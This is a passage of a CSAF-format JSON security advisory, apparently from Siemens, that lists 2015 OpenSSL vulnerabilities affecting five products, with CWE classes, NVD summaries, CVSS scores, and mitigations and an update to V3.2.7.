especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0290" }, { "cve": "CVE-2015-0291", "cwe": { "id": "CWE-476", "name": "NULL Pointer Dereference" }, "notes": [ { "category": "summary", "text": "The sigalgs implementation in t1_lib.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by using an invalid signature_algorithms extension in the ClientHello message during a renegotiation.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0291" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0291" }, { "cve": "CVE-2015-0292", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "Integer underflow in the EVP_DecodeUpdate function in crypto/evp/encode.c in the base64-decoding implementation in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted base64 data that triggers a buffer overflow.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0292" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.3, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0292" }, { "cve": "CVE-2015-0293", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "The SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (s2_lib.c assertion failure and daemon exit) via a crafted CLIENT-MASTER-KEY message.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0293" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-0293" }, { "cve": "CVE-2015-1787", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "The ssl3_get_client_key_exchange function in s3_srvr.c in OpenSSL 1.0.2 before 1.0.2a, when client authentication and an ephemeral Diffie-Hellman ciphersuite are enabled, allows remote attackers to cause a denial of service (daemon crash) via a ClientKeyExchange message with a length of zero.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1787" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 3.7, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-1787" }, { "cve": "CVE-2015-1788", "cwe": { "id": "CWE-327", "name": "Use of a Broken or Risky Cryptographic Algorithm" }, "notes": [ { "category": "summary", "text": "The BN_GF2m_mod_inv function in crypto/bn/bn_gf2m.c in OpenSSL before 0.9.8s, 1.0.0 before 1.0.0e, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b does not properly handle ECParameters structures in which the curve is over a malformed binary polynomial field, which allows remote attackers to cause a denial of service (infinite loop) via a session that uses an Elliptic Curve algorithm, as demonstrated by an attack against a server that supports client authentication.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1788" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-1788" }, { "cve": "CVE-2015-1789", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "The X509_cmp_time function in crypto/x509/x509_vfy.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted length field in ASN1_TIME data, as demonstrated by an attack against a server that supports client authentication with a custom verification callback.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1789" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-1789" }, { "cve": "CVE-2015-1790", "cwe": { "id": "CWE-476", "name": "NULL Pointer Dereference" }, "notes": [ { "category": "summary", "text": "The PKCS7_dataDecodefunction in crypto/pkcs7/pk7_doit.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PKCS#7 blob that uses ASN.1 encoding and lacks inner EncryptedContent data.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1790" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-1790" }, { "cve": "CVE-2015-1791", "cwe": { "id": "CWE-362", "name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)" }, "notes": [ { "category": "summary", "text": "Race condition in the ssl3_get_new_session_ticket function in ssl/s3_clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact by providing a NewSessionTicket during an attempt to reuse a ticket that had been obtained earlier.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1791" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.3, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-1791" }, { "cve": "CVE-2015-1792", "cwe": { "id": "CWE-690", "name": "Unchecked Return Value to NULL Pointer Dereference" }, "notes": [ { "category": "summary", "text": "The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OID for a hash function.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1792" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-1792" }, { "cve": "CVE-2015-1794", "cwe": { "id": "CWE-682", "name": "Incorrect Calculation" }, "notes": [ { "category": "summary", "text": "The ssl3_get_key_exchange function in ssl/s3_clnt.c in OpenSSL 1.0.2 before 1.0.2e allows remote servers to cause a denial of service (segmentation fault) via a zero p value in an anonymous Diffie-Hellman (DH) ServerKeyExchange message.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1794" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2015-1794" }, { "cve": "CVE-2015-3193", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "The Montgomery squaring implementation in crypto/bn/asm/x86_64-mont5.pl in OpenSSL 1.0.2 before 1.0.2e on the x86_64 platform, as used by the BN_mod_exp function, mishandles carry propagation and produces incorrect output, which makes it easier for remote attackers to obtain sensitive private-key information via an attack against use of a (1) Diffie-Hellman (DH) or (2) Diffie-Hellman Ephemeral (DHE) ciphersuite.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3193" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", 